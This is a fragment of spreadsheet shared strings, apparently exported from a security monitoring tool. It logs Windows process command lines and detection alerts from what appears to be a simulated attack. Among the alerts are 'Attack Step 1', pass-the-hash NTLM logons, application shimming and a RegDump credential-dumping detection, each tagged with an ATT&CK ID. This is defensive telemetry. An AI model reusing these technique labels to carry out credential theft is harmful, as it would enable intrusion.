  <si>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--field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=5628 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.754</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=5656 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.772</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.840</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.853</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.880</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.883</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.886</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:10.137</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:10.138</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=5656 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:10.181</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:12.163</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:18.100</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:45.385</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:45.434</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:45.454</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=renderer --pdf-upsell-enabled --no-pre-read-main-dll --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-GB --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --time-ticks-at-unix-epoch=-1746795313056761 --launch-time-ticks=1291602234 --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=4424 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:46.603</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-GB --service-sandbox-type=utility --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:01.061</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:01.080</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:16.775</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:16.786</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:18.015</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:18.776</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\cmd.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:18.787</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:18.816</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:18.831</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:18.837</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:18.844</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:20.952</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:21.586</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:JQM+ctgc3UehG9Jz.0.3 -wce:0000000000000210  -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:22.246</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:23.861</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:25.071</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:25.101</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:25.119</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:26.648</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:26.673</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:17:36.030</t>
  </si>
  <si>
    <t>Name resolution for the name _ldap._tcp.dc._msdcs.mshome.net. timed out</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:21:14.072</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:21:14.076</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:21:14.128</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:21:29.689</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:21:29.690</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:21:29.726</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:21:31.009</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:21:31.017</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:21:31.025</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:22:03.250</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:22:24.666</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:22:46.746</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:22:46.785</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:22:46.786</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:22:46.831</t>
  </si>
  <si>
    <t>C:\\Windows\\System32\\Dism\\dismhost.exe {1CE7A71C-3AAC-4735-A269-2AD9E8C46D0F}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:24:59.258</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:25:12.416</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:JQM+ctgc3UehG9Jz.0.4 -wce:0000000000000210  -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:25:34.497</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:JQM+ctgc3UehG9Jz.0.5 -wce:0000000000000210  -m:devinv.dll -f:CreateDeviceInventory</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:25:38.242</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:JQM+ctgc3UehG9Jz.0.6 -wce:0000000000000210  -m:appraiser.dll -f:UpdateAvStatus</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:25:41.567</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:JQM+ctgc3UehG9Jz.0.7 -wce:0000000000000210  -m:GeneralTel.dll -f:RunGeneralTelemetry</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:26:19.464</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:26:19.661</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:26:21.268</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:26:21.273</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:26:21.331</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:26:22.453</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:26:30.377</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:26:30.400</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:26:30.408</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:26:31.428</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:26:31.431</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:26:32.472</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:27:02.779</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:27:05.281</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:27:05.289</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:27:43.966</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:JQM+ctgc3UehG9Jz.0.8 -wce:000000000000020C  -m:appraiser.dll -f:DoScheduledTelemetryRun</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:18.913</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:23.819</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:23.892</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:32.051</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:32.101</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:32.235</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:40.505</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:40.512</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:45.005</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:45.013</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:46.043</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:47.560</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:47.567</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:47.751</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:28:48.901</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:03.578</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:03.605</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:05.363</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:11.188</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:11.191</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:20.988</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:20.989</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:21.143</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:23.870</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:36.086</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:36.189</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:37.434</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:37.861</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:41.922</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:41.981</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:41.982</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:29:42.065</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:30:53.098</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:31:06.791</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\makecab.exe\" C:\\WINDOWS\\Logs\\CBS\\CbsPersist_20250509102514.log C:\\WINDOWS\\Logs\\CBS\\CbsPersist_20250509102514.cab</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:31:06.809</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:31:13.169</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:31:47.494</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:31:47.528</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:31:47.588</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:31:49.427</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:32:19.378</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:32:21.706</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:32:21.731</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:32:25.547</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:32:25.561</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:32:25.569</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:32:25.579</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:33:20.608</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:33:23.254</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:JQM+ctgc3UehG9Jz.0.9 -wce:000000000000020C  -m:invagent.dll -f:RunUpdate</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:33:24.672</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:JQM+ctgc3UehG9Jz.0.10 -wce:000000000000020C  -m:aemarebackup.dll -f:BackupMareData</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:33:27.356</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:33:28.507</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:33:29.805</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:33:29.830</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:33:29.893</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:33:29.941</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:33:29.942</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:33:29.989</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:33:31.726</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:34:38.222</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:35:32.389</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:35:32.472</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:36:01.537</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:36:01.838</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:36:01.853</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:36:03.130</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=5512 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:36:30.628</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:37:51.478</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\rundll32.exe\" /d acproxy.dll,PerformAutochkOperations</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:37:51.489</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\appidcertstorecheck.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:37:51.501</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:40:12.028</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:40:42.410</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:40:42.442</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:40:42.523</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:40:42.552</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:40:42.561</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:40:42.583</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:40:44.061</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:40:44.062</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:40:44.074</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:45:43.817</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:45:43.833</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:45:43.850</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:45:44.922</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:45:44.942</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:45:44.943</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:45:53.300</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:45:53.346</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:50:32.331</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:50:32.355</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:50:43.853</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:50:43.861</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:50:43.880</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:50:43.881</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:50:43.886</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:50:44.881</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:52:59.047</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:53:00.632</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:53:30.348</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:55:42.361</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:55:42.392</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:55:42.412</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:55:42.422</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:55:43.547</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:56:35.947</t>
  </si>
  <si>
    <t>Windows Defender: Antimalware platform is running and in a healthy state</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:56:37.935</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:56:37.962</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:56:37.983</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:56:37.992</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:56:43.935</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:56:43.936</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:56:43.940</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:57:57.985</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:57:57.986</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:57:58.003</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:57:58.042</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:58:00.290</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:58:18.733</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:58:24.810</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\sdbinst.exe -m -bg</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:58:24.823</t>
  </si>
  <si>
    <t>Application Compatibility Database launched</t>
  </si>
  <si>
    <t>[T1546.011]</t>
  </si>
  <si>
    <t>[Privilege Escalation, Persistence]</t>
  </si>
  <si>
    <t>[Application Shimming]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:58:24.826</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:58:31.192</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:58:35.057</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:58:35.090</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:58:35.111</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:58:35.123</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:15.501</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:15.508</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:15.515</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:15.561</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:22.740</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:22.779</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:25.240</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:25.269</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:25.270</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:34.581</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:38.587</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:42.592</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:45.628</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:45.652</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:45.691</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:46.638</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:46.690</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:46.691</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:50.147</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:50.155</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:53.586</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:00:53.604</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:47.498</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:49.906</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:49.922</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:49.923</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:49.935</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:49.943</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:49.951</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:49.957</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:49.962</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:49.970</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:49.975</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:51.037</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:51.058</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:51.060</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:04:51.068</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:05:00.927</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:05:00.933</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:05:00.940</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:05:00.946</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:05:02.116</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:05:02.175</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:05:02.319</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:05:02.331</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:05:02.424</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:05:02.444</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:05:02.446</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:05:04.843</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:05:04.865</t>
  </si>
  <si>
    <t>Attack Step 1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:07:36.304</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:07:36.321</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:07:36.343</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:07:37.652</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:07:37.659</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:07:37.666</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:07:57.319</t>
  </si>
  <si>
    <t>NTLM</t>
  </si>
  <si>
    <t>NtLmSsp</t>
  </si>
  <si>
    <t>10.12.25.23</t>
  </si>
  <si>
    <t>Successful Remote Logon Detected - User:\ANONYMOUS LOGON - NTLM authentication, possible pass-the-hash attack.</t>
  </si>
  <si>
    <t>[T1550.002 T1078.002]</t>
  </si>
  <si>
    <t>[Defense Evasion, Lateral Movement, Persistence, Privilege Escalation, Initial Access]</t>
  </si>
  <si>
    <t>[Pass the Hash, Domain Accounts]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:07:57.342</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:09:21.689</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:09:21.700</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:09:21.746</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:10:53.318</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:10:53.347</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:10:53.357</t>
  </si>
  <si>
    <t>Successful Remote Logon Detected - User:\Windows11 - NTLM authentication, possible pass-the-hash attack.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:10:53.378</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:10:53.389</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:11:08.380</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:11:08.385</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:11:08.429</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:11:10.469</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:11:11.388</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:11:33.758</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:11:33.782</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:11:33.791</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:11:33.807</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:11:33.820</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:11:40.139</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:11:44.493</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:12:11.313</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:12:11.326</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:12:11.334</t>
  </si>
  <si>
    <t>Successful Remote Logon Detected - User:\Windows11EWS - NTLM authentication, possible pass-the-hash attack.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:12:51.340</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:12:51.388</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:12:51.455</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:12:51.550</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:13:14.144</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:13:36.278</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:13:36.327</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:13:51.730</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:13:51.731</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:39.658</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:39.660</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:39.667</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:39.679</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:41.623</t>
  </si>
  <si>
    <t>Windows Defender: Antimalware engine used Dynamic Signature Service to get additional definitions</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:42.963</t>
  </si>
  <si>
    <t>Behavior:Win32/RegDump.SA</t>
  </si>
  <si>
    <t>Windows Defender: Antimalware platform detected  potentially unwanted software ()</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:43.095</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:43.096</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:44.040</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:44.096</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:45.529</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:45.542</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe\" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:47.939</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:14:50.965</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\AUDIODG.EXE 0x000000000000044C 0x000000000000046C</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:18.153</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:18.206</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:18.465</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:18.468</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:21.203</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:22.912</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:22.974</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:22.975</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:24.278</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:24.301</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:28.275</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:28.278</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:28.280</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:47.064</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:49.235</t>
  </si>
  <si>
    <t>Windows Defender: Antimalware platform performed an action to protect you from potentially unwanted software ()</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:53.832</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:59.094</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:15:59.142</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:16:01.283</t>
